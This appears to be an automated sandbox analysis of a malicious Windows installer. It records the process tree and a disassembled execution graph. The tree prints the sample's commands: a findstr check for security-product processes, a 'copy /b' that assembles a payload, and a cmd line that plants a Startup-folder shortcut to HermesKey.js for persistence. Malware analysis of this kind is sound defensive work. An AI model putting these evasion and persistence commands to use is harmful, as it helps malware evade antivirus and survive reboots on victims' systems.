                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                              Imagebase:0x680000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /c md 724598
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\findstr.exe
                                              Wow64 process (32bit):true
                                              Commandline:findstr /V "WowLiberalCalOfficer" Weight
                                              Imagebase:0x680000
                                              File size:29'696 bytes
                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:09:30:41
                                              Start date:18/12/2024
                                              Path:C:\Users\user\AppData\Local\Temp\724598\Thermal.pif
                                              Wow64 process (32bit):true
                                              Commandline:Thermal.pif y
                                              Imagebase:0x770000
                                              File size:893'608 bytes
                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 8%, ReversingLabs
                                              Has exited:false

                                              Target ID:12
                                              Start time:09:30:42
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\choice.exe
                                              Wow64 process (32bit):true
                                              Commandline:choice /d y /t 5
                                              Imagebase:0x40000
                                              File size:28'160 bytes
                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:13
                                              Start time:09:30:42
                                              Start date:18/12/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
                                              Imagebase:0x790000
                                              File size:236'544 bytes
                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:14
                                              Start time:09:30:42
                                              Start date:18/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:09:30:55
                                              Start date:18/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"
                                              Imagebase:0x7ff7a9ab0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:17
                                              Start time:09:30:55
                                              Start date:18/12/2024
                                              Path:C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
                                              Imagebase:0x8b0000
                                              File size:893'608 bytes
                                              MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 8%, ReversingLabs
                                              Has exited:false


                                                Execution Graph

                                                Execution Coverage:17.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:20.7%
                                                Total number of Nodes:1526
                                                Total number of Limit Nodes:33
4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 
4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 
4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 
4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 
3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 
3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 
403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 
3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f 
PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 
3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 
3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 